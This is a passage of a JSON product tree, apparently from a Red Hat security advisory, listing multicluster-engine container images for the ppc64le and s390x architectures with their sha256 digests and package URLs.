"registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "product_identification_helper": {"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3Ac17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776038312"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "product_identification_helper": {"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3A4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776382931"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "product_identification_helper": {"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776210187"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "product_identification_helper": {"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3Ab5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775826440"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "product_identification_helper": {"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3Ad26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776382976"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "product_identification_helper": {"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3Af33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776382929"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "product_identification_helper": {"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3Ac7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776296503"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "product_identification_helper": {"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775864344"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "product_identification_helper": {"purl": "pkg:oci/console-mce-rhel9@sha256%3A32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776223790"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "product_identification_helper": {"purl": "pkg:oci/discovery-rhel9@sha256%3A4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776103237"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "product_identification_helper": {"purl": "pkg:oci/hive-rhel9@sha256%3A2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776286716"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "product_identification_helper": {"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3Ae006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775691813"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "product_identification_helper": {"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3A5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775950593"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "product_identification_helper": {"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775950592"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "product_identification_helper": {"purl": "pkg:oci/image-based-install-rhel9@sha256%3A07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776469416"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "product_identification_helper": {"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3Aed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775736638"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "product_identification_helper": {"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3Acd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775691793"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "product_identification_helper": {"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3A6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776296534"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "product_identification_helper": {"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3Ae32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775778326"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "product_identification_helper": {"purl": "pkg:oci/placement-rhel9@sha256%3A969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775977212"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "product_identification_helper": {"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3A855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1776296540"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "product_identification_helper": {"purl": "pkg:oci/registration-rhel9@sha256%3A3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775977180"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "product_identification_helper": {"purl": "pkg:oci/registration-operator-rhel9@sha256%3A9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775977181"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "product": {"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "product_identification_helper": {"purl": "pkg:oci/work-rhel9@sha256%3A068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655?arch=ppc64le&repository_url=registry.redhat.io/multicluster-engine&tag=1775977184"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "product_id": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "product_identification_helper": {"purl": "pkg:oci/addon-manager-rhel9@sha256%3A865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775977126"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "product_id": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "product_identification_helper": {"purl": "pkg:oci/must-gather-rhel9@sha256%3Aa7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776434265"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "product_id": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "product_identification_helper": {"purl": "pkg:oci/backplane-rhel9-operator@sha256%3Aed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775678862"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "product_identification_helper": {"purl": "pkg:oci/cluster-api-provider-agent-rhel9@sha256%3Ae05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776038312"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "product_id": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "product_identification_helper": {"purl": "pkg:oci/cluster-api-provider-kubevirt-rhel9@sha256%3Aabdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776382931"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "product_id": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "product_identification_helper": {"purl": "pkg:oci/cluster-curator-controller-rhel9@sha256%3A5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776210187"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "product_id": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "product_identification_helper": {"purl": "pkg:oci/cluster-image-set-controller-rhel9@sha256%3A8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775826440"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "product_identification_helper": {"purl": "pkg:oci/cluster-proxy-addon-rhel9@sha256%3Ae246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776382976"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "product_id": "registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "product_identification_helper": {"purl": "pkg:oci/cluster-proxy-rhel9@sha256%3Adeacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776382929"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "product_id": "registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "product_identification_helper": {"purl": "pkg:oci/clusterclaims-controller-rhel9@sha256%3A93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776296503"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "product_id": "registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "product_identification_helper": {"purl": "pkg:oci/clusterlifecycle-state-metrics-rhel9@sha256%3A76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1775864344"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "product_id": "registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "product_identification_helper": {"purl": "pkg:oci/console-mce-rhel9@sha256%3Ad564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776223790"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "product_identification_helper": {"purl": "pkg:oci/discovery-rhel9@sha256%3A27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09?arch=s390x&repository_url=registry.redhat.io/multicluster-engine&tag=1776103237"}}}, {"category": "product_version", "name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "product": {"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "product_id": 